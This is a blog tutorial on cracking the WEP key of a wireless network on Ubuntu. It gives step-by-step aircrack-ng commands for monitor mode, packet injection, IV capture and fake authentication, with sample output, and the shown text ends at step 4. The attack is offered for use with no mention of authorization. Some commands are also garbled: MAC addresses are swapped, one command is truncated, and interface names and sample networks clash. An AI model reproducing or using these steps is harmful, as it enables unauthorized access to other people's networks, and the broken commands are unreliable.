Hack WEP Key in Ubuntu Linux

This is a simple tutorial on, How to hack the WEP key of a wireless network. We have the tools available in ubuntu to get the WEP Key.  Before proceeding this I am mentioning the complete steps below along with the pre-requisites. This article seems to be very lengthy but please be patience while reading 


  • You are using drivers patched for injection. Use the injection test to confirm your card can inject prior to proceeding.
  • There is at least one wired or wireless client connected to the network and they are active.
  • You should have the aircrack-ng installed in your machine. If its not installed then type sudo apt-get install aircrack-ng

Terms used in this article

  • MAC address of PC running aircrack-ng suite: 00:1e:c9:4a:ca:5d
  • BSSID (MAC address of access point): 00:1e:c9:44:cd:6a
  • ESSID (Wireless network name): Ronny
  • Access point channel: 9
  • Wireless interface: eth1

Step 1

Start the wireless interface in monitor mode on Access Point channel

In this step we will make our card in to monitor mode. By enabling the card in monitor mode your card can listen every packet in the air. When the monitor mode is disabled your card can hear only the packets addressed to you.

First stop eth1 by entering:
sudo airmon-ng stop eth1

The system responds:

Interface       Chipset         Driver

eth1           Centrino        madwifi-ng

Type “iwconfig” in the terminal to ensure there are no other ethX interfaces.  The output in the terminal will look like this.

lo        no wireless extensions.
eth0      no wireless extensions.
wifi0     no wireless extensions.

If there are any remaining ethX interfaces, then stop each one. When you are finished, run “iwconfig” to ensure there are none left. Now, enter the following command to start the wireless card on channel 9 in monitor mode:

airmon-ng start wifi0 9

Substitute the channel number that your wireless Access Point runs on for “9” in the command above. This is important. You must have your wireless card locked to the AP channel for the following steps in this tutorial to work correctly.

The system will respond:

Interface       Chipset         Driver
eth1           Centrino        madwifi-ng

You will notice that “eth1” is reported above as being put into monitor mode.  To confirm the interface is properly setup, enter “iwconfig”.

The system will respond:

lo        no wireless extensions.
wifi0     no wireless extensions.
eth0      no wireless extensions.
eth1      IEEE 802.11g  ESSID:”"  Nickname:”"
Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3
Retry:off   RTS thr:off   Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
Tx excessive retries:0  Invalid misc:0   Missed beacon:0

In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card. Please note that only the madwifi-ng drivers show the MAC address of your wireless card, the other drivers do not do this. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.

Step 2

Test Wireless Device Packet Injection

The purpose of this step ensures that your card is within distance of your AP and can inject packets to it or not.


 aireplay-ng -9 -e Ronny -a 00:1e:c9:4a:ca:5d eth1


  • -9 means injection test
  • -e Ronny is the wireless network name
  • -a 00:1e:c9:4a:ca:5d is the access point MAC address
  • eth1 is the wireless interface name

The system should respond with:

09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
 09:23:35 Trying broadcast probe requests...
 09:23:35 Injection is working!
 09:23:37 Found 1 AP 

 09:23:37 Trying directed probe requests...
 09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
 09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
 09:23:39 30/30: 100%

The last line is important. Ideally it should say 100% or a very high percentage. If it is low then you are too far away from the AP or too close. If it is zero then injection is not working and you need to patch your drivers or use different drivers.

Step 3

Start airodump-ng to capture the IVs

The purpose of this step is to capture the IVs generated. This step starts airodump-ng to capture the IVs from the specific access point. Open another console session to capture the generated IVs. Then enter:

 airodump-ng -c 9 --bssid 00:1e:c9:44:cd:6a -w output eth1

While the injection is taking place (later), the screen will look similar to this:

 CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 

 00:1e:c9:44:cd:6a 42 100 5240 178307 338 9 54 WEP WEP Ronny
 BSSID STATION PWR Lost Packets Probes
 00:1e:c9:44:cd:6a 00:1e:c9:44:cd:6a 42 0 183782

Step 4

Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.

To associate with an access point, use fake authentication:

1 0 -e Ronny -a 00:1e:c9:4a:ca:5d -h 00:1e:c9:44:cd:6a eth1

Success looks like:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful

Or another variation for picky access points:

aireplay-ng -1 6000 -o 1 -q 10 -e Ronny -a 00:1e:c9:4a:ca:5d -h 00:1e:c9:44:cd:6a eth1

Success looks like:

18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
# and so on.

Here is an example of what a failed authentication looks like:

8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request

Notice the “Got a deauthentication packet” and the continuous retries above. Do not proceed to the next step until you have the fake authentication running correctly.

Technorati Tags:Technorati Tags:
Your rating: None Average: 3.3 (4 votes)



Sponsered links

Bookmark Us!


Page Rank


Be Human first, then Engineer

— Vismaya

Explore Tags

Follow Us